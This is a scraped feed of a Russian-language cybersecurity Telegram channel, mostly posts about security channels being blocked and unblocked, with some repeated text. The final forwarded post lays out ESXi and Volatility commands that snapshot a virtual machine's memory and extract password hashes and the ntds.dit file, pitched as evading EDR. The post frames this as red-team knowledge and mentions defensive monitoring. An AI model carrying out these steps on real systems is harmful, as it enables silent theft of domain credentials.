Всем привет!
Тут прошла маленькая или большая 🌊 блокировка ТГ-каналов по теме кибербеза. Почему заблокировали, на данный момент никто не знает.
(Может уже и знают)
Очень надеюсь, что это просто ошибка, так как странно, если ТГ решит таким образом начать недружественное общение с таким контингентом людей.
Оставлю ссылку на пост от Похек.
Что вы думаете? Голосуйте.
Тут прошла маленькая или большая 🌊 блокировка ТГ-каналов по теме кибербеза. Почему заблокировали, на данный момент никто не знает.
(Может уже и знают)
Очень надеюсь, что это просто ошибка, так как странно, если ТГ решит таким образом начать недружественное общение с таким контингентом людей.
Оставлю ссылку на пост от Похек.
Что вы думаете? Голосуйте.
Forwarded from BugXplorer (j b)
Please open Telegram to view this post
VIEW IN TELEGRAM
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Также идёт набор в 🎓 PFS Academy
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Whitehat Lab
Как вы уже знаете, мой предыдущий канал был заблокирован.
Получено уведомление:
Your community Pentest HaT was blocked for violations of the Telegram Terms of Service (illegal goods) based on user reports confirmed by our moderators.
К сожалению, никаких подробностей мне не предоставили — что именно считается "illegal goods", осталось загадкой. Судя по всему, кто-то решил накидать абуз, и канал забанили без разбирательства.
Вот что написано в ToS:
▪️ Не использовать мессенджер для рассылки спама или обмана пользователей;▪️ Не призывать к насилию в публичных каналах, ботах и других общедоступных чатах в Telegram;▪️ Не размещать незаконный порнографический контент в каналах, ботах и других общедоступных чатах в Telegram.▪️ Не заниматься деятельностью, которая признана незаконной в большинстве стран. Это включает жестокое обращение с детьми, продажу или предложение незаконных товаров и услуг (наркотики, оружие, поддельные документы) и т.д.
Понятия не имею, что из этого я мог нарушить
Конечно приятного мало и я слегка расстроился, но руки не опустились и было принято решение создать новый канал
Все важные материалы перенесены, а также сохранена работа ботов. Планирую продолжить публиковать обзоры полезных Red Team инструментов, свежих CVE, PoC-эксплоитов и других полезных материалов из мира кибербезопасности.
Буду признателен всем тем кто подпишется
Репост и распространение информации приветствуется
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Также идёт набор в 🎓 PFS Academy
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from PurpleBear (Vadim Shelest)
Всем привет!
Если этот пост опубликуется, значит канал разблокировали🎉
Хотел сказать огромное спасибо всем кто помог с решением вопроса и просто приходил в личку со словами поддержки🙏
Если этот пост опубликуется, значит канал разблокировали🎉
Хотел сказать огромное спасибо всем кто помог с решением вопроса и просто приходил в личку со словами поддержки🙏
❤3
Хабр
Простая агентурная работа: интервью с социальными инженерами
Проверка системы безопасности компании это не только пентесты и фишинговые рассылки, но и шпионские операции с проникновением на территорию заказчика. Этим занимаются самые законспирированные...
🔗Ссылка:
https://habr.com/ru/post/660169/
https://habr.com/ru/post/660169/
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Также идёт набор в 🎓 PFS Academy
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from s0ld13r ch. (s0ld13r)
Volatility + ESXi = Бесшумный дамп хэшей и NTDS 😈
Когда дело касается извлечения учетных данных, большинство атак сосредоточено на виндовых машинах – Mimikatz, DCSync, Pass-the-Hash. Но что, если спуститься ниже? Если ты контролируешь гипервизор, тебе даже не нужно ломать саму ОС – ты просто забираешь память ВМ целиком и извлекаешь из нее хэши, NTDS и другие артефакты без триггеров EDR/SIEM🐸
Ниже описал прикольный вектор через Volatility и консоль VMware для бесшумного дампа кредов с серверов🪨
Поиск информации о виртуальных машинах на сервере❗️
Создаем snapshot системы с обязательным извлечением🔫
В😆
А самый угар в том что на уровне ОС самой виртуалки и никакими антивирусами это не выловить, поможет только мониторинг активности и грамотная настройка Access List-ов😏
P.S Автор против блэчеров и активно выступает за согласованние действий с владельцами систем
🧢 s0ld13r
Когда дело касается извлечения учетных данных, большинство атак сосредоточено на виндовых машинах – Mimikatz, DCSync, Pass-the-Hash. Но что, если спуститься ниже? Если ты контролируешь гипервизор, тебе даже не нужно ломать саму ОС – ты просто забираешь память ВМ целиком и извлекаешь из нее хэши, NTDS и другие артефакты без триггеров EDR/SIEM
Ниже описал прикольный вектор через Volatility и консоль VMware для бесшумного дампа кредов с серверов
Поиск информации о виртуальных машинах на сервере
vim-cmd vmsvc/getallvms
vim-cmd vmsvc/power.getstate <VMID>
vim-cmd vmsvc/get.snapshotinfo <VMID>
Создаем snapshot системы с обязательным извлечением
*.vmem файла vim-cmd vmsvc/snapshot.create <VMID> <snapshotname> <description> true true
ls -ll /vmfs/volumes/
ls -ll /vmfs/volumes/<UUID>/<snapshotname>
В
/vmfs/volumes/<UUID>/<snapshotname> будет файл с расширением *.vmem который можно будет проанализировать при помощи Volatility /tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" imageinfo
/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" --profile="WindowsVersion" hashdump
/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" --profile="WindowsVersion" filescan | grep ntds.dit
/tmp/v -f "/vmfs/volumes/<UUID>/<snapshotname>/file.vmem" --profile="WindowsVersion" dumpfiles -Q <ntds memaddress> --name file -D /tmp/ntds.dit
А самый угар в том что на уровне ОС самой виртуалки и никакими антивирусами это не выловить, поможет только мониторинг активности и грамотная настройка Access List-ов
P.S Автор против блэчеров и активно выступает за согласованние действий с владельцами систем
Please open Telegram to view this post
VIEW IN TELEGRAM